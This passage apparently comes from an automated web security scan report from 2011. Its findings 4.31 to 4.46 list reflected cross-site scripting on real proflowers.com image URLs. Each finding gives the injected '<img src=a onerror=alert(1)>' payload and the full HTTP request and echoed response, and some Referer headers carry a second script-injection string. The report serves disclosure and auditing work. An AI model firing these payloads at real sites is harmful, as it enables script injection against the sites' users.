Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 118
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:15 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ1f963<img src=a onerror=alert(1)>0abf99f1fea

4.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1bd76<img%20src%3da%20onerror%3dalert(1)>d86e9b37c19 was submitted in the REST URL parameter 9. This input was echoed as 1bd76<img src=a onerror=alert(1)>d86e9b37c19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ1bd76<img%20src%3da%20onerror%3dalert(1)>d86e9b37c19?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:31 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ1bd76<img src=a onerror=alert(1)>d86e9b37c19

4.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34c7a<img%20src%3da%20onerror%3dalert(1)>c0a23b23259 was submitted in the REST URL parameter 9. This input was echoed as 34c7a<img src=a onerror=alert(1)>c0a23b23259 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ34c7a<img%20src%3da%20onerror%3dalert(1)>c0a23b23259?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:05 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ34c7a<img src=a onerror=alert(1)>c0a23b23259

4.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8ece4<img%20src%3da%20onerror%3dalert(1)>c6f0ee0aa84 was submitted in the REST URL parameter 9. This input was echoed as 8ece4<img src=a onerror=alert(1)>c6f0ee0aa84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ8ece4<img%20src%3da%20onerror%3dalert(1)>c6f0ee0aa84?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:17 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ8ece4<img src=a onerror=alert(1)>c6f0ee0aa84

4.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 53c0a<img%20src%3da%20onerror%3dalert(1)>cfb6f0bb3c3 was submitted in the REST URL parameter 9. This input was echoed as 53c0a<img src=a onerror=alert(1)>cfb6f0bb3c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ53c0a<img%20src%3da%20onerror%3dalert(1)>cfb6f0bb3c3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:59 GMT
Connection: close

Unable to find /ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ53c0a<img src=a onerror=alert(1)>cfb6f0bb3c3

4.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 73bd4<img%20src%3da%20onerror%3dalert(1)>3471c81f839 was submitted in the REST URL parameter 9. This input was echoed as 73bd4<img src=a onerror=alert(1)>3471c81f839 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF73bd4<img%20src%3da%20onerror%3dalert(1)>3471c81f839?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF73bd4<img src=a onerror=alert(1)>3471c81f839

4.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 34789<img%20src%3da%20onerror%3dalert(1)>a33706b7028 was submitted in the REST URL parameter 9. This input was echoed as 34789<img src=a onerror=alert(1)>a33706b7028 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn34789<img%20src%3da%20onerror%3dalert(1)>a33706b7028?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/GingerVase_tn34789<img src=a onerror=alert(1)>a33706b7028

4.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 55ab4<img%20src%3da%20onerror%3dalert(1)>7e214382de3 was submitted in the REST URL parameter 9. This input was echoed as 55ab4<img src=a onerror=alert(1)>7e214382de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF55ab4<img%20src%3da%20onerror%3dalert(1)>7e214382de3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:49 GMT
Connection: close

Unable to find /ProvideCommerce/IRS20assrt10_PF55ab4<img src=a onerror=alert(1)>7e214382de3

4.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9baa<img%20src%3da%20onerror%3dalert(1)>043817ff139 was submitted in the REST URL parameter 9. This input was echoed as a9baa<img src=a onerror=alert(1)>043817ff139 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PFa9baa<img%20src%3da%20onerror%3dalert(1)>043817ff139?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:54 GMT
Connection: close

Unable to find /ProvideCommerce/IRS20blue_gv11_PFa9baa<img src=a onerror=alert(1)>043817ff139

4.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b58f3<img%20src%3da%20onerror%3dalert(1)>89a2ea4ec6 was submitted in the REST URL parameter 9. This input was echoed as b58f3<img src=a onerror=alert(1)>89a2ea4ec6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_mb58f3<img%20src%3da%20onerror%3dalert(1)>89a2ea4ec6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:08 GMT
Connection: close

Unable to find /ProvideCommerce/KiwiPineapleFOTMSav_mb58f3<img src=a onerror=alert(1)>89a2ea4ec6

4.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 520ee<img%20src%3da%20onerror%3dalert(1)>73aa06e9372 was submitted in the REST URL parameter 9. This input was echoed as 520ee<img src=a onerror=alert(1)>73aa06e9372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF520ee<img%20src%3da%20onerror%3dalert(1)>73aa06e9372?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:23 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtories4_pnk10_PF520ee<img src=a onerror=alert(1)>73aa06e9372

4.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6d67c<img%20src%3da%20onerror%3dalert(1)>ec1cb1d74be was submitted in the REST URL parameter 9. This input was echoed as 6d67c<img src=a onerror=alert(1)>ec1cb1d74be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF6d67c<img%20src%3da%20onerror%3dalert(1)>ec1cb1d74be?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:16 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtperu_pnk10_TEST_PF6d67c<img src=a onerror=alert(1)>ec1cb1d74be

4.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e4c1<img%20src%3da%20onerror%3dalert(1)>b4e9f2fec83 was submitted in the REST URL parameter 9. This input was echoed as 4e4c1<img src=a onerror=alert(1)>b4e9f2fec83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF4e4c1<img%20src%3da%20onerror%3dalert(1)>b4e9f2fec83?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxassrtories_pnk11_PF4e4c1<img src=a onerror=alert(1)>b4e9f2fec83

4.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c3599<img%20src%3da%20onerror%3dalert(1)>d8063d74a3a was submitted in the REST URL parameter 9. This input was echoed as c3599<img src=a onerror=alert(1)>d8063d74a3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PFc3599<img%20src%3da%20onerror%3dalert(1)>d8063d74a3a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:15 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxassrtperu_tv11_PFc3599<img src=a onerror=alert(1)>d8063d74a3a

4.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 65a8a<img%20src%3da%20onerror%3dalert(1)>8a6382d71f6 was submitted in the REST URL parameter 9. This input was echoed as 65a8a<img src=a onerror=alert(1)>8a6382d71f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF65a8a<img%20src%3da%20onerror%3dalert(1)>8a6382d71f6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:09 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxstargazer_pnk11_PF65a8a<img src=a onerror=alert(1)>8a6382d71f6

4.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c83bd<img%20src%3da%20onerror%3dalert(1)>50f64b94a0e was submitted in the REST URL parameter 9. This input was echoed as c83bd<img src=a onerror=alert(1)>50f64b94a0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PFc83bd<img%20src%3da%20onerror%3dalert(1)>50f64b94a0e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:02 GMT
Connection: close

Unable to find /ProvideCommerce/LLYroyalspring_pnk10_PFc83bd<img src=a onerror=alert(1)>50f64b94a0e

4.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ

Issue detail

